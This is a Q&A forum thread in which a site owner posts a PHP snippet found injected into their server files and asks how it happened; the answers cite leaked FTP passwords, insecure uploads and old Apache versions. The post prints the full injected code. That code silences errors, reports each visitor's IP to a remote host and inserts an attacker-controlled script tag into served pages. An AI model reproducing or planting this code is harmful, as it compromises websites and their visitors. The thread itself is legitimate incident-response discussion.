0

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.

#be7339#
if (empty($qjqb)) 
{
    error_reporting(0);
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents')) 
    {
        function __url_get_contents($remote_url, $timeout)
        {
            if(function_exists('curl_exec')) 
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            } 
            elseif (function_exists('file_get_contents') &&     ini_get('allow_url_fopen')) 
            {
                 $ctx = @stream_context_create(array('http' =>array('timeout' => $timeout,)));
                 $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                 $handle = @fopen($remote_url, "r");
                 $_url_get_contents_data = @stream_get_contents($handle);
            } else {
                 $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
   }

   if (!function_exists('__file_get_url_contents'))
   {
       function __file_get_url_contents($remote_url)
       {
           if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url,  $matches))     
           {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            } else {
                // Bad remote_url-format
                return FALSE;
            }

            if ($protocol == "http") 
            {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            } else 
            {
                // Bad protocol
                return FALSE;
            }

            if (!$socket)
            {
                // Error creating socket
                return FALSE;
            }

            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request)) 
            {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) &&
               ($buf = @fread($socket, 4096)) !== FALSE) {
               $response .= $buf;
            }
            if ($buf === FALSE) {
                // Error reading response
                return FALSE;
            }
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }

    if (empty($__var_to_echo) && empty($remote_domain)) 
    {
        $_ip = $_SERVER['REMOTE_ADDR'];
        $qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
        $qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
        if (strpos($qjqb, 'http://') === 0)
        {
            $__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
            echo $__var_to_echo;
        }
    }
}

I would like to ask how this could have happened. And how to prevent this in the future.

Thanks in advance.

Improve this question
1
  • 2
    Better suited to Server Fault or Information Security, but too broad even for there. Buy a book on computer security and/or hire a security professional? Commented Apr 23, 2014 at 14:54

4 Answers 4

Reset to default
1

Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

This has also been a part of our discovery there was an unattended PC in the building which had a lot of viruses and connection information in the FileZilla history. Thank you for your contribution.
1

The most common way this happens is you probably have a script that allows files uploads. Then if the script is not validating what file is uploaded a malicious user could upload a php file.

If your upload folder allows parsing of PHP files the user could run that PHP file in the browser, it could be some sort of file explorer which will then show the user all the files on your server. Now if any files have the right permissions the user could easily edit the file to include the extra code you are seeing.

Improve this answer

3 Comments

To avoid this, you should never store any user-uploaded file into your webroot, but store it outside and always access it through a custom handler. regarding access rights check ,this is also a better practice. It's important to note there could be a lot of other valid explanations... tracking a security hole is always very complicated.
Thank you for your reply. On most of the sites there are no file uploads involved though there is a login form but all input is escaped and sanitized. I think I'm looking at a FTP password which has been leaked.
Yes could be FTP then. If you have FTP access log files take a look there for anything unusual. Also check the last modified date, the owner/group settings and the permissions of the file. These things often give you clues of how the file was accessed. If the permissions only allow the FTP user then it must have been via FTP. Best of luck.
1

Usually it's because somebody else got access to your FTP or you allow uploading PHP files.

You should look into other files, because there could be another code, that keeps adding those lines to your code (just guess because of "#be7339#" at the beginning.

Improve this answer

1 Comment

There have been a lot of files infected and they all started with a code like that. Which is why I'm looking for the cause and solution to prevent this from happening again. So far I've reset all available FTP passwords and cleaned the files of the malicious code. Thank you for your thoughts on this problem.
1

What is the Apache version on your server ? This problem can come from using an outdated version..

Look at this link about security breaches on old versions Apache:

http://httpd.apache.org/security/vulnerabilities_20.html

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.